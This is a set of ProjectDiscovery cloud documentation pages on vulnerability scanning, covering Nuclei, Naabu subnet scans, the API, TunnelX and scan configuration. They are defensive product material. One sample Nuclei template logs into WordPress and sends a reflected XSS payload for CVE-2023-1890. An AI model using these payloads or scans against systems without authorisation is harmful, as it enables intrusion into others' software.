* **Massively Parallel Scanning Engine:** Unlike running scanners on a single server (even a powerful one), the cloud platform can distribute workloads across many nodes. This massively parallel approach means you can scan dozens or hundreds of targets concurrently, each with hundreds of payloads or templates, without bogging down. The result is scans completing far faster than in a self-managed setup – up to *50 times faster than a typical Nuclei self-hosted deployment*. By scaling out horizontally, the cloud handles large-scale reconnaissance and vulnerability scanning in a fraction of the time, which is crucial when you need quick feedback or have tight assessment windows.
* **High Throughput with Reliability:** The cloud platform is tuned for high-throughput scanning – it can handle running tens of thousands of requests per second when needed, all while gracefully managing retries, timeouts, and failures. Because ProjectDiscovery operates the infrastructure, it is optimized to avoid common pain points like running out of memory or crashing under load. You don't have to guess at thread counts or worry about CPU spikes; the platform auto-scales and balances load to keep scans efficient from start to finish. This means you get both speed *and* stability, even for complex scanning tasks.
* **Real-Time Security Updates:** Speed is not just about how fast packets can be sent, but also how current your scanning knowledge is. The cloud platform benefits from **real-time vulnerability template updates** fed by our research team and community contributions. The instant a new vulnerability check is available, cloud scans can include it. This real-time update cycle ensures you can scan for the latest threats *immediately*. In contrast, in a self-hosted scenario you might update your tools weekly or ad-hoc, possibly missing critical windows. The platform essentially keeps you on the cutting edge of detection without any manual intervention.
* **Scaling to Your Entire Attack Surface:** Because it's built on cloud infrastructure, the platform can easily scale to cover your full environment, however large or distributed. Need to scan assets across multiple regions or cloud providers? The platform can do that in parallel. It supports **multi-cloud asset discovery and monitoring** to find and track assets in AWS, GCP, Azure, and more. This wide coverage is coupled with the ability to run scans from different geographical regions to minimize latency to targets, if needed. In practical terms, whether you have 50 websites or 50,000, or whether those are spread across on-prem data centers and cloud accounts, you can count on the platform to enumerate and assess them in a standardized way. You won't be constrained by the limits of a single machine or network – the cloud dynamically allocates resources to meet your scanning needs.
* **Faster Time to Remediation:** Ultimately, the performance gains and scalability translate into earlier detection of vulnerabilities. When scans that used to take days now finish in an hour, your team gets findings that much sooner. Faster discovery means you can start fixing issues sooner, reducing exposure. It also enables more frequent re-scans; instead of scanning critical assets monthly due to time constraints, perhaps you can scan them weekly or daily now. This agility in scanning cadence helps ensure that if a new risk appears, it's caught and addressed promptly, keeping your security posture much more current.
## Standardized Security Processes
Migrating to the ProjectDiscovery Cloud Platform not only improves raw capabilities, but also helps **standardize your security assessment processes**. For many organizations, one of the biggest challenges is ensuring everyone follows best practices and that security tasks are done consistently. The cloud platform is opinionated in the right ways – it provides structure that makes your operations more repeatable and efficient:
* **Consistent, Templated Workflows:** The platform allows you to define and use templated workflows for common tasks. For example, you might have a "Weekly External Scan" template that includes a specific set of scanners, templates, and notification settings. By using such predefined scans, every execution follows the same proven process. This **standardization of workflows** ensures that no matter who runs the scan, the coverage and methodology are uniform. It reduces the chance of human error (such as someone forgetting to include a critical test) and makes your scanning regimen systematic. Over time, this builds confidence that your security checks are thorough and consistent.
* **Organization-Wide Methodology:** When all teams use the cloud platform, you effectively establish a common security testing methodology across the organization. Application security, cloud security, and ops teams are no longer using completely different tools or techniques – they're all working within the same framework. This unified approach means findings from different parts of the organization are directly comparable and all follow the same risk scoring and format. If your company has multiple engineering teams, standardizing on the platform helps ensure each team's security practices are at the same high standard, which is hard to achieve when everyone uses disparate open-source setups.
* **Faster Onboarding and Training:** New engineers or security analysts can get up to speed quicker because they have a clear, centralized system to learn. Instead of teaching newcomers a grab-bag of scripts and command-line flags, you can train them on the ProjectDiscovery Cloud interface and workflow. The learning curve is lower, and they can start contributing sooner. The platform's dashboards and reports are also more accessible to non-security stakeholders compared to raw tool output, which means developers, product managers, or auditors can understand the security data without needing deep tool knowledge. This broader understanding further enforces the practice, as more people in the organization can engage with the security process in a standard way.
* **Improved Collaboration & Accountability:** With standardized processes comes better teamwork. Everyone knows how a finding should be documented, how a remediation should be validated, and how to mark an issue as resolved in the system. Features like shared workspaces, comments, and assignment of findings to owners mean the hand-off from detection to remediation is well-defined. Meanwhile, **audit logs on the platform record all these actions**, so you have a trail of who did what. This clarity greatly improves accountability – if a vulnerability was missed or left unpatched, you can trace back through the logs and workflow to see where the process might be improved. Over time, analyzing this data helps refine and strengthen your security operations playbook.
* **Security and Compliance Alignment:** A standardized platform naturally produces standardized outputs (dashboards, reports, metrics). This makes it much easier to align with security policies and compliance requirements. You can configure the platform to enforce certain checks or frequencies (for example, require that all critical apps are scanned monthly). Compliance frameworks often call for evidence of regular, consistent security activities – the platform can be that evidence, showing a schedule of scans and how issues are tracked to closure. By automating and standardizing those activities, you reduce the manual effort to prove compliance. In essence, the platform bakes best practices and policy adherence into the daily routine, so passing audits becomes a byproduct of doing the right thing consistently.
***
By moving **from open-source tools to the ProjectDiscovery Cloud Platform**, organizations can dramatically boost their security capabilities while still retaining the flexibility that made the open-source approach successful. The cloud platform offloads maintenance and accelerates scanning, provides a unified view of risk for the entire team, and introduces enterprise features that simplify management and reporting. At the same time, it respects the need for customization and integration by working hand-in-hand with open-source workflows. The result is a solution that empowers security and engineering teams to cover more ground in less time, with greater confidence and consistency. In an era of fast-evolving threats and expanding attack surfaces, the combination of community-powered tools and a scalable cloud platform helps ensure your security processes are both **agile and standardized** – enabling you to find and fix vulnerabilities before they can be exploited.
# External Vulnerability Scanning
Source: https://docs.projectdiscovery.io/cloud/scanning/external-scan
External vulnerability scanning is crucial for understanding your organization's security posture from an attacker's perspective. ProjectDiscovery's approach combines thorough asset discovery with precise vulnerability detection, focusing on exploitable issues rather than theoretical or low-severity vulnerabilities.
Before starting external scans, ensure you have a complete inventory of your internet-facing assets. Learn more about our [Asset Discovery and Management](/cloud/assets/overview) capabilities.
## Scanning Capabilities
ProjectDiscovery offers multiple scanning approaches, with automated scanning enabled by default and additional options for custom requirements:
Scans automatically initiate when:
* New assets are discovered
* New templates are released
* Infrastructure changes are detected

Additional scanning options let you:
* Create specific scan workflows
* Focus on selected assets
* Apply custom template selection
* Create compliance-focused scans
* Validate security baselines
* Meet custom compliance requirements
* Detect misconfigurations

Beyond scan creation, the platform also lets you:
* Automatically revalidate findings to confirm fixes and prevent regression
* Connect with ticketing systems for streamlined vulnerability management
* Add custom headers and variables for specialized scanning requirements
* Configure custom scan rates to match your infrastructure capacity (Enterprise)
ProjectDiscovery offers tiered scanning capabilities: Pro users can perform ultra-fast cloud scans (50x faster) with support for up to 1,000 assets, while Enterprise users gain additional features like custom scan limits, custom rate limits, and fixed scan IPs for whitelisting. Free users are limited to internal vulnerability scans only - learn more about internal scanning [here](/cloud/scanning/nuclei-scan).
## Get Started with External Scanning
* Launch your first external vulnerability scan
* Customize scan parameters and templates
* Connect with your security tools and workflows
## Automation & API Access
Besides the UI-based scanning, you can programmatically trigger scans using our REST API:
```bash
POST https://api.projectdiscovery.io/v1/scans
```
Required headers:
```http
X-API-Key: your-api-key
X-Team-Id: your-team-id # Find at cloud.projectdiscovery.io/settings/team
```
Example request body:
```json
{
  "name": "External Scan",
  "targets": ["example.com"],
  "templates": ["cves", "vulnerabilities"],
  "recommended": true,
  "scan_config_ids": ["config-id"],
  "alerting_config_ids": ["alert-id"],
  "reporting_config_ids": ["report-id"]
}
```
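Putting the endpoint, headers, and body together, a minimal curl sketch might look like this (the API key, team ID, and configuration IDs are placeholders to replace with your own values):
```bash
# Trigger a new external scan via the ProjectDiscovery API
curl -X POST "https://api.projectdiscovery.io/v1/scans" \
  -H "X-API-Key: your-api-key" \
  -H "X-Team-Id: your-team-id" \
  -H "Content-Type: application/json" \
  -d '{
    "name": "External Scan",
    "targets": ["example.com"],
    "templates": ["cves", "vulnerabilities"],
    "recommended": true
  }'
```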
For detailed API documentation and additional endpoints, refer to our [API Reference](https://docs.projectdiscovery.io/api-reference/scans/create-scan).
## Browsing Scan Results
Once your scans are complete, you can explore the results to gain insights into your security posture. The ProjectDiscovery Cloud Platform provides a comprehensive view of all scan results, allowing you to:
* **View All Scans**: Access a summary of all scans in your environment. Use categories like Vulnerabilities, Info, and Affected Assets to filter and refine your results.
* **Explore Individual Scans**: Click on a specific scan to view detailed results, including vulnerabilities, affected assets, and detection information. Use filters such as Status, Severity, and Host to navigate through the data. Example scan URL: `cloud.projectdiscovery.io/scans/`.
* **Review Vulnerabilities**: Expand each vulnerability to see complete details, including the templates used, assets affected, and detection information. You can also export vulnerabilities in various formats (JSON, CSV, PDF) and modify their status (e.g., false positives, closed).
* **Retest and Remediate**: Retest individual vulnerabilities to confirm fixes and review remediation recommendations provided for each issue.
* **Access Logs**: View scanning logs for detailed information on time, assets, detection templates, and match results. Logs also include error information to assist with troubleshooting. Access logs directly using the format: `/scans//logs`.
New to ProjectDiscovery? Start with [Asset Discovery](/cloud/assets/overview) to ensure comprehensive coverage of your external attack surface.
## Next Steps
* [Configure Asset Discovery](/cloud/assets/adding-assets)
* [Create Custom Templates](/cloud/editor/introduction)
* [View Integration Options](/cloud/integrations)
# Internal Network Vulnerability Scanning
Source: https://docs.projectdiscovery.io/cloud/scanning/internal-scan
Internal network security is critical yet often overlooked. Once attackers gain initial access through configuration drift, phishing, or compromised credentials, they can rapidly expand their foothold by exploiting internal vulnerabilities. This lateral movement can lead to devastating breaches, making internal vulnerability scanning as crucial as external assessments.
ProjectDiscovery offers two distinct approaches for internal network vulnerability scanning, each designed to fit different organizational needs while maintaining our core focus on exploitability and accurate detection.
* **Local scanning & upload:** Run Nuclei locally and upload results to PDCP. Ideal for teams with existing scanning workflows or specific network restrictions.
* **Cloud-managed scanning:** Use TunnelX to trigger remote scans through the PDCP UI. Perfect for large networks and centralized security management.
Internal scanning helps identify misconfigurations, unpatched systems, and security gaps that could be exploited for lateral movement before attackers can leverage them.
## Port Discovery with Naabu
Before running vulnerability scans, it's recommended to first identify open ports in your internal network using [Naabu](https://github.com/projectdiscovery/naabu) - a fast and reliable port scanner. This ensures comprehensive vulnerability scanning coverage.
```bash
# Scan entire internal subnet and save results
naabu -host 192.168.1.1/24 -o internal_ports.txt
# Scan specific port ranges
naabu -host 192.168.1.1/24 -p 80,443,8000-9000 -o internal_ports.txt
# Faster scanning with increased rate
naabu -host 192.168.1.1/24 -rate 1000 -o internal_ports.txt
```
The discovered ports can be used as input for vulnerability scanning to ensure thorough coverage of all exposed services. Learn more about Naabu's capabilities in our [detailed documentation](/tools/naabu/overview).
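For example, a quick sketch chaining the two tools (the subnet and file name are placeholders):
```bash
# Discover open ports across an internal subnet and save host:port pairs
naabu -host 192.168.1.1/24 -o internal_ports.txt

# Feed the discovered host:port pairs into Nuclei as scan targets
nuclei -l internal_ports.txt
```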
Naabu will soon be integrated directly into ProjectDiscovery's internal vulnerability scanning capabilities. Contact our [sales team](https://projectdiscovery.io/request-demo) to be notified when this feature becomes available.
## Method 1: Local Scanning & Upload
This approach lets you run Nuclei locally and upload results to the ProjectDiscovery Cloud Platform (PDCP).
### Set up your API Key
To connect your existing Nuclei results to PDCP you will need to create a free API Key:
1. Visit [https://cloud.projectdiscovery.io](https://cloud.projectdiscovery.io)
2. Open the settings menu from the top right and select "API Key" to create your API key
3. Use the `nuclei -auth` command, and enter your API key when prompted.
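If you prefer a non-interactive setup (for example in CI), the API key can also be supplied via an environment variable instead of running `nuclei -auth`; a minimal sketch, assuming Nuclei honors the same `PDCP_API_KEY` variable used elsewhere in this guide:
```bash
# Non-interactive alternative to `nuclei -auth` (assumed environment variable)
export PDCP_API_KEY="your_api_key"
nuclei -u https://example.com -cloud-upload
```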
### Configure Team (Optional)
If you want to upload the scan results to a team workspace instead of your personal workspace, you can configure the Team ID using either method:
* **Obtain Team ID:**
* Navigate to [https://cloud.projectdiscovery.io/settings/team](https://cloud.projectdiscovery.io/settings/team)
* Copy the Team ID from the top right section
* **CLI Option:**
```bash
nuclei -tid XXXXXX -cloud-upload
```
* **ENV Variable:**
```bash
export PDCP_TEAM_ID=XXXXX
```
### Run Your Scan
Run your scan with the upload flag:
```bash
# Single target
nuclei -u http://internal-target -cloud-upload
# Multiple targets
nuclei -l internal-hosts.txt -cloud-upload
# With specific templates
nuclei -u http://internal-target -t misconfiguration/ -cloud-upload
```
This method is ideal when you want to maintain complete control over scan execution or integrate with existing automation scripts.
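For example, a minimal cron sketch (the schedule, target list, and paths are placeholders) that runs a nightly internal scan and uploads the results:
```bash
# Crontab entry: run at 02:00 every night and upload findings to PDCP
0 2 * * * /usr/local/bin/nuclei -l /opt/scans/internal-hosts.txt -cloud-upload -silent >> /var/log/nuclei-internal.log 2>&1
```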
## Method 2: Cloud-Managed Scanning (Recommended)
[TunnelX](https://github.com/projectdiscovery/tunnelx) is our open-source tunneling solution, purpose-built by ProjectDiscovery to enable secure internal scanning. It establishes isolated SOCKS5 proxies that let you trigger scans directly from the ProjectDiscovery interface while ensuring your internal infrastructure remains protected and unexposed.
Cloud-managed internal scanning with TunnelX is an Enterprise-exclusive feature. Free and Pro users can still perform internal scans using the local scanning method described above.
**System Requirements**\
TunnelX is designed to be lightweight and efficient. Minimum recommended specifications for optimal performance:
* **CPU:** 1 vCPU/Core
* **Memory:** 2GB RAM
* **Network:** 100Mbps network interface
* **Storage:** 10GB available disk space
* **Operating System:** Linux (recommended), macOS, or Windows
These specifications are suitable for most deployment scenarios. A basic VPS (Virtual Private Server) meeting these requirements is sufficient for running TunnelX efficiently.
### Install TunnelX
Choose your preferred installation method:
```bash Docker (Recommended)
# Pull and run the official image
docker run --network host -d \
-e PDCP_API_KEY="your_api_key" \
projectdiscovery/tunnelx:latest
# Or build locally
docker build -t tunnelx https://github.com/projectdiscovery/tunnelx.git
docker run --network host -d -e PDCP_API_KEY="your_api_key" tunnelx
```
```bash Go Installation
# Install using go install
go install github.com/projectdiscovery/tunnelx@latest
# Set your API key and run
export PDCP_API_KEY="your_api_key"
tunnelx
```
```bash Source
# Clone and run from source
git clone https://github.com/projectdiscovery/tunnelx.git
cd tunnelx
export PDCP_API_KEY="your_api_key"
go run .
```
# ProjectDiscovery Vulnerability Scanning Overview
Source: https://docs.projectdiscovery.io/cloud/scanning/overview
ProjectDiscovery's vulnerability scanning platform combines an attacker's mindset with powerful automation to uncover real security issues across your environment. It focuses on **exploitability**, meaning that identified vulnerabilities aren't just theoretical – they are validated through actual exploitation attempts. This approach contrasts with traditional scanners that often rely on version checks or CVE databases and can overwhelm teams with false positives. By leveraging the open-source **Nuclei** engine and its extensive template library, ProjectDiscovery delivers precise, actionable insights tailored to your assets, with far less noise and more relevant findings for your security and engineering teams.
## Attacker's Mindset vs Traditional Scanners
Traditional vulnerability scanners tend to focus on known vulnerabilities by matching software versions to CVE entries or using simple signature checks. This method can miss configuration issues and often flags vulnerabilities that *might* exist without proving exploitability. In contrast, ProjectDiscovery's platform takes an attacker's perspective from the start:
* **Active Exploitation Testing:** Instead of assuming a system is vulnerable because of its version, ProjectDiscovery actually attempts to exploit the issue (in a safe manner) to confirm the vulnerability is real. This dramatically reduces false positives because only genuine, exploitable weaknesses are reported. Security teams can trust that each finding is a true risk, not just a guessed one.
* **Beyond Just CVEs:** Attackers look for any weakness, not just known CVEs. Likewise, ProjectDiscovery detects misconfigurations and security gaps that traditional scanners often miss. For example, it can catch an open S3 bucket or an enabled default password – issues that might not have a CVE ID but are severe if left unchecked. This broad coverage ensures you find not only publicly known vulnerabilities but also the often-overlooked flaws in your systems.
* **Proof-of-Concept Evidence:** Each vulnerability comes with evidence and details to prove its impact. The platform provides clear proof-of-concept (PoC) data – such as specific response output or payload confirmation – for every finding. This means when engineers receive a report, they also get the context needed to understand and reproduce the issue, making remediation much more straightforward.
* **Customization and Community-Powered Testing:** Unlike many closed-box scanners, ProjectDiscovery is highly customizable. It uses Nuclei's YAML-based templates, allowing security teams to write **custom vulnerability checks** for edge-case issues or business logic flaws unique to your environment. In addition, the platform is fueled by a global community of researchers and engineers contributing over 9,000 templates covering the latest CVEs and emerging threats. This community-powered model means the scanner is always up-to-date with newly discovered exploits and "zero-day" attack techniques, keeping you one step ahead of attackers.
By adopting an attacker's mindset in its design, ProjectDiscovery effectively bridges the gap between **security** and **engineering** needs. Security professionals get the depth and coverage to find complex vulnerabilities, while engineers get high-fidelity results with concrete evidence, making it clear **why** an issue matters and how to fix it.
## Comprehensive Vulnerability Coverage
One of the core strengths of ProjectDiscovery's scanning is the **breadth of vulnerabilities and issues** it can detect. Through Nuclei's extensive template library, the platform scans for a wide range of vulnerability types across web applications, networks, cloud infrastructure, and more. Below are the key categories of findings it covers:
* **Known CVEs (Common Vulnerabilities and Exposures):** Leverage an up-to-date repository of templates to catch systems vulnerable to high-profile CVEs. This includes everything from critical remote code execution bugs to widely exploited vulnerabilities in popular software. The platform's community-driven template library tracks the latest disclosed CVEs and trending threats, so you can quickly identify if an asset is affected by a known issue soon after it's disclosed.
* **Web Application Flaws:** Identify common web app vulnerabilities – such as SQL injection, Cross-Site Scripting (XSS), insecure authentication, and other OWASP Top 10 issues – using an active library of community-powered templates. The scanner can crawl and probe your web applications to find weaknesses in forms, APIs, and sessions that attackers could exploit.
* **Misconfigurations:** Uncover security misconfigurations in software and services that could lead to breaches. This covers a broad set of issues like default or weak credentials, directory listing enabled on servers, misconfigured TLS/SSL settings, and other setup mistakes. ProjectDiscovery goes beyond simple CVE checks to catch these exploitable misconfigurations and security gaps that might not be tracked in any CVE database. By finding these, the platform helps you close holes that attackers commonly look for when scanning targets.
* **Exposed Services & Open Ports:** Discover services running that shouldn't be publicly accessible or are improperly secured. The scanner can enumerate open ports and test services like SSH, FTP, SMB, databases, and more for weaknesses. For example, it can detect an open database with no firewall, or an SSH service using a default password. Identifying exposed services is crucial for understanding your attack surface and eliminating unintended entry points.
* **Cloud Infrastructure Issues:** Assess your cloud environments (AWS, GCP, Azure, and others) for misconfigured resources and exposed assets. ProjectDiscovery's templates include checks for things like open cloud storage buckets, publicly readable database snapshots, overly permissive IAM roles, and other cloud-specific misconfigurations. These checks ensure your cloud configurations follow best practices and that no cloud service is unknowingly exposing data or services to the internet.
* **Custom and Emerging Threats:** Create and run **custom security tests** specific to your applications and infrastructure. If your organization has a unique in-house application or a non-standard protocol, you can write your own Nuclei templates to scan for vulnerabilities in those systems. This flexibility means you're not limited to known issues – you can continuously expand scanning to cover new threat scenarios or internal policies. Additionally, the platform's AI-assisted template generation can help turn pentest findings or bug bounty reports into new automated checks quickly, enabling you to adapt rapidly to emerging threats.
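As a simple illustration, a custom check for an in-house application could be a minimal Nuclei template along these lines (the ID, path, and matcher string are placeholders for your own environment):
```yaml
id: example-internal-admin-exposure

info:
  name: Example - Internal Admin Console Exposed
  author: your-team
  severity: high
  tags: custom,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin/status"
    matchers:
      - type: word
        part: body
        words:
          - "Internal Admin Console"
```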
By covering everything from well-known CVEs to configuration slip-ups, ProjectDiscovery ensures comprehensive coverage of your security posture. Both security teams and developers can appreciate this breadth: security teams know that even obscure vectors are being checked, and developers get peace of mind that common mistakes (like an open admin interface or default config) won't slip through unnoticed.
## Scalability and Cloud-Native Integration
ProjectDiscovery Cloud is built to **scale** your vulnerability scanning efforts across many assets without the headache of managing infrastructure. Using the Nuclei engine under the hood, the platform can scan thousands of hosts concurrently, enabling enterprise-grade performance for large environments. In practical terms, this means you can run thorough scans on large asset inventories in a fraction of the time traditional tools require. For example, ProjectDiscovery's cloud scanning can operate up to 50× faster than standard open-source scanning on a single machine, handling hundreds of targets in parallel and making it feasible to regularly scan extensive networks or cloud environments.
Several features make the scanning process both high-performance and low-effort:
* **Automated Asset Discovery Integration:** The platform ties in with asset discovery data to ensure no asset goes unscanned. Newly discovered external assets are automatically queued for scanning, and similarly, if new Nuclei templates are released by the community, the platform can trigger scans on relevant assets. This automation means your security assessments stay up-to-date with the latest threats and changes in your environment *without* constant manual intervention.
* **Cloud-Native Efficiency:** All scanning is performed in the cloud, leveraging ProjectDiscovery's optimized infrastructure. You don't need to provision servers or juggle scanner installations – the heavy lifting is managed for you. This not only provides speed, but also consistency: every scan uses the latest engine and templates, ensuring uniform results. Enterprise users can even customize scan rates and IP whitelisting settings to fit their environment's capacity and compliance needs.
* **Multi-Protocol and Multi-Vector Support:** Nuclei (and by extension ProjectDiscovery) isn't limited to web HTTP checks. It supports over 6 different protocols (HTTP(S), TCP, DNS, SMB, etc.) as well as specialized code-based checks. This means the scanner can validate vulnerabilities whether they exist in web endpoints, network services, or even within misconfigured files and code. From web pages to network ports, the platform can stitch together complex exploit scenarios across different layers, simulating how a real attacker might chain multiple weaknesses.
* **High Accuracy through Template Validation:** Each Nuclei template includes specific **match conditions** that must be met for a vulnerability to be reported, greatly increasing accuracy. For instance, a template might check that a certain response header or message content exists only if an exploit was successful. This approach, combined with the exploit attempt itself, yields high-confidence results. According to ProjectDiscovery, the Nuclei-powered scans focus on vulnerabilities that "have real-world impact rather than just relying on CVSS scores". In other words, the scanner prioritizes issues that genuinely matter, so teams aren't chasing informational or low-impact findings at the cost of more critical ones.
By scaling horizontally and using intelligent automation, ProjectDiscovery Cloud ensures that even as your asset inventory grows or new threats emerge, you can maintain a fast and effective scanning routine. This scalability is crucial for engineering teams who need to incorporate security checks into large, dynamic environments without slowing down development or operations.
## Continuous Retesting and Workflow Integration
Finding vulnerabilities is only part of the challenge – making sure they get fixed and stay fixed is equally important. ProjectDiscovery addresses this through features that integrate with your remediation workflow and enable ongoing retesting of issues:
* **One-Click Vulnerability Retesting:** Once a developer believes a vulnerability is fixed, security teams can quickly verify it using the platform's retesting feature. Rather than running a full scan again, you can target just the specific vulnerability on the affected asset. The platform will rerun the exact check (template) and confirm whether the issue still exists. This ad-hoc validation is much faster than a complete rescan and provides immediate feedback. If the retest shows the vulnerability is resolved, the finding's status is automatically updated to "Fixed" in the platform. If not, it remains open, indicating further work is needed. This capability saves time for both engineers and security analysts, closing the loop between finding a bug and verifying the remediation.
* **Regression Testing (Preventing Recurrence):** ProjectDiscovery can **continuously monitor previously fixed vulnerabilities** to ensure they don't resurface. It essentially remembers vulnerabilities that were marked as fixed and periodically or upon changes retests them. This guards against regressions – for example, if a code change or configuration rollback accidentally re-introduces an old flaw, the platform will catch it. By preventing the recurrence of known issues, you maintain security improvements over the long term instead of fixing the same problems repeatedly.
* **Integration with Ticketing Systems:** The platform was designed to slot into existing engineering workflows. It can automatically create tickets in systems like Jira when new vulnerabilities are found, ensuring that developers get notified through the tools they already use. Each ticket can include the vulnerability details and proof-of-concept evidence, so engineers have what they need to start fixing the issue. Moreover, as mentioned, once a fix is deployed, the retesting feature can be triggered directly from the ticketing workflow (for example, via an API or integration) to verify the fix, and then update the ticket status. ProjectDiscovery's integration capabilities extend to alerting and messaging platforms as well – you can receive notifications on Slack, Microsoft Teams, or via custom webhooks, but the key value is that it **streamlines vulnerability management into your normal development process**. Security and DevOps teams don't have to juggle separate systems; everything from discovery to fix verification can be tracked in one cohesive flow.
* **Multi-Status Tracking and Reporting:** In addition to opening tickets, the platform supports multiple status designations (Open, In Progress, Fixed, Reopened, etc.) for each finding and keeps an audit trail. This makes it easy for both security and engineering teams to see the lifecycle of a vulnerability: when it was found, who is addressing it, and whether it has been confirmed resolved. Progress can be monitored via the web dashboard or pulled via API for custom reporting. Engineering managers and security leads can use this to ensure nothing falls through the cracks and to gather metrics (like how long it takes to remediate issues on average).
By integrating retesting and tracking into existing workflows, ProjectDiscovery removes much of the friction that typically comes with vulnerability management. **Engineering teams new to vulnerability scanning will find this approach approachable**, as it ties into familiar tools (like issue trackers) and provides clear "evidence-based" tasks to work on. At the same time, **security professionals get the assurance** that fixes are being validated and that the organization's risk is continuously being re-evaluated as things change. It's a win-win: developers can fix issues with confidence and verify their work easily, and security teams can enforce remediation and catch regressions without manual effort.
## Delivering Value to Security and Engineering Teams
ProjectDiscovery's vulnerability scanning platform is engineered to provide value across the board – from seasoned security analysts to software engineers who might be less familiar with security tooling:
* **For Security Teams:** It offers depth and confidence. The wide vulnerability coverage means security analysts can uncover both common and esoteric issues (from CVEs to cloud misconfigs) in one platform. The attacker-centric approach and exploit validation ensure that when they raise an issue, it's backed by solid evidence, reducing debates over "is this a false positive?". The ability to customize scans via templates or integrate new exploits quickly means the security team can adapt the tool to their organization's threat model. In short, it reduces the time spent triaging noise and lets analysts focus on true threats, with the peace of mind that the findings are real.
* **For Engineering Teams:** It emphasizes clarity and workflow fit. Developers get vulnerability reports with concrete proof and even steps to reproduce, which demystifies the findings and makes them actionable. The integration with ticketing systems and the straightforward retest mechanism fold neatly into the development lifecycle – fixing and validating a security bug becomes as seamless as closing any other bug ticket. Because the scanner finds misconfigurations and practical security issues (not just CVE IDs), it often catches problems that relate to operational practices (like an open port or a weak configuration), which engineering teams are well positioned to fix quickly once identified. And since the results are high-fidelity, engineers aren't wasting time chasing ghosts or tweaking scan settings – they can trust the results and focus on remediation.
In summary, ProjectDiscovery's platform brings **clarity, depth, and efficiency** to vulnerability scanning. By thinking like an attacker and blending community-driven intelligence with enterprise features, it ensures that both security and engineering teams can collaboratively improve the organization's security posture. The security team benefits from a powerful tool that surfaces real risks with evidence, and the engineering team benefits from clear guidance and integration into their normal workflows. This hybrid of robust technical capability and ease-of-use is what makes ProjectDiscovery's vulnerability scanning stand out from traditional scanners that simply enumerate issues. It transforms vulnerability management from a cumbersome, noisy process into a streamlined, attacker-focused practice of finding and fixing the issues that truly matter.
Ultimately, ProjectDiscovery delivers a vulnerability scanning solution that not only **finds more relevant issues** across your applications, networks, and cloud, but also helps you **fix them faster** and **prevent them from coming back** – a value proposition that both security specialists and engineers can appreciate.
# Scan & Template Configurations
Source: https://docs.projectdiscovery.io/cloud/scanning/parameters
Configure custom scan settings, HTTP headers, template variables, and template profiles
## Overview
ProjectDiscovery's scanning engine supports various configuration options to customize scan behavior and template execution. This includes HTTP headers, template variables, interactsh settings, and template profiles. Some templates, particularly those requiring authentication or specific parameters, need additional configuration to work effectively in the cloud platform.
## Scan Configurations
### HTTP Headers
Configure custom HTTP headers that will be included in all scan requests. This is useful for:
* Adding authentication tokens
* Setting specific User-Agent strings
* Including custom tracking headers
* Passing required API keys
### Template Variables
Define variables that templates can reference during execution. Common use cases include:
* Authentication credentials
* API tokens
* Custom parameters
* Environment-specific values
### Interactsh Settings
Configure out-of-band (OOB) testing parameters:
* Custom Interactsh server settings
* Correlation timeout values
* Callback configurations
## Authentication Example
Let's look at a practical example using WordPress authentication, which is required by over 150 different Nuclei templates.
Here's a template that requires authentication parameters:
```yaml
id: CVE-2023-1890

info:
  name: Tablesome < 1.0.9 - Cross-Site Scripting
  severity: medium

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1
        Host: {{Hostname}}
```
This template uses two undefined variables (`{{username}}` and `{{password}}`). While in CLI you would use:
```bash
nuclei -id CVE-2023-1890 -var username=admin -var password=password123 -target https://example.com
```
In ProjectDiscovery Cloud, we need to configure these through the scan configuration interface.
## Setting Up Scan Configurations
### Creating a New Configuration
1. Navigate to Scans → Configurations
2. Select "Scan Options"
3. Click "New Config"
4. Enter a descriptive name (e.g., "WP Authentication")
5. Choose the configuration type:
   * HTTP Headers
   * Template Variables
   * Interactsh Settings
6. Add the configuration details:
   * For template variables: add key-value pairs (e.g., username: admin), set the scope (global or template-specific), and configure visibility settings
   * For HTTP headers: specify the header name and value, and set application conditions
7. Choose when to apply this configuration:
   * Enable for all scans (global)
   * Manual selection per scan
8. Set template matching criteria (optional)
### Template Profiles
Create custom template collections based on:
* Severity levels (Critical, High, Medium, Low)
* Tags (wordpress, cve2023, authenticated, etc.)
* Protocol types (HTTP, DNS, TCP, etc.)
* Template IDs
To create a template profile:
1. Navigate to Scans → Configurations → Template Profiles
2. Click "New Profile"
3. Select filtering criteria
4. Save and name your profile
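For teams that also scan locally, these profile criteria roughly correspond to Nuclei's CLI filters; a small sketch for reference (the target list is a placeholder):
```bash
# Filter by severity and tags, similar to a severity/tag-based template profile
nuclei -l targets.txt -severity critical,high -tags wordpress,cve2023

# Or pin the run to specific template IDs
nuclei -l targets.txt -id CVE-2023-1890
```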
## Advanced Configuration Examples
### WordPress Authentication
```yaml
name: "WordPress Auth"
type: template_variables
variables:
  username: "admin"
  password: "secure_password"
scope: "wordpress,wp-plugin"
```
### Custom Headers
```yaml
name: "API Authentication"
type: http_headers
headers:
  Authorization: "Bearer {{token}}"
  X-Custom-Header: "value"
```
### Interactsh Configuration
```yaml
name: "Custom OOB Settings"
type: interactsh
settings:
  server: "custom.interactsh.com"
  token: "your_token"
  correlation_timeout: 30
```
## Best Practices
1. **Security Considerations**
* Use environment variables for sensitive values
* Implement least-privilege access
* Regularly rotate credentials
* Audit configuration usage
2. **Performance Optimization**
* Group related configurations
* Use template-specific variables when possible
* Monitor configuration impact on scan times
3. **Maintenance**
* Document configuration purposes
* Review and update regularly
* Remove unused configurations
* Test changes before production use
When using authentication credentials or sensitive parameters, ensure they are stored securely and accessed only by authorized users. Consider using environment variables or secure credential storage for sensitive values.
## What's Next?
After setting up configurations:
1. Create new scans using your configurations
2. Monitor scan results for proper parameter usage
3. Adjust configurations based on results
4. Create template profiles for specific use cases
For template development guidance, visit our [Template Editor](/cloud/editor/overview) documentation.
# Real-Time Autoscan for Trending Exploits
Source: https://docs.projectdiscovery.io/cloud/scanning/real-time-scans
Real-time scanning keeps your infrastructure protected against emerging threats by instantly scanning your assets when new Nuclei templates are added to ProjectDiscovery. These threats may range from zero-days and 1-day exploits to newly disclosed CVEs being actively exploited in the wild.
Security researchers and engineers worldwide contribute Nuclei templates as soon as new vulnerabilities trend on the internet, often within hours of disclosure. When these templates are merged into our repository, your assets are automatically scanned without waiting for scheduled runs. This rapid response is crucial for protecting against active exploitation campaigns, especially during the critical window between vulnerability disclosure and patch availability.
